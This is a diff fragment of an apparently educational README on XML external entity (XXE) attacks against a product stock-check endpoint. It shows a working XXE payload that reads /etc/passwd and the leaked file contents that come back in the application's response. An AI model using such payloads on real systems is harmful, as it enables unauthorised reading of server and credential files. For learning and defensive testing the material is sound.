NayanDZ/XXE/README.md

 <stocCheck><productId>381</productId></stockCheck>
 ```

-Here no defenses against XXE attacks, so you can exploit XXE to retrieve the `/etc/passwd` file by submitting following XXE payload:
+Here. no defenses against XXE attacks, so you can exploit XXE to retrieve the `/etc/passwd` file by submitting following XXE payload:
 ```
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
 <stockCheck><productId>&xxe;</productId></stockCheck>
 ```
 This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value.
-This causes the application's response to include the contents of the file:
+This causes the application's response to include the contents of the file.
 ```
 Invalid product ID: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin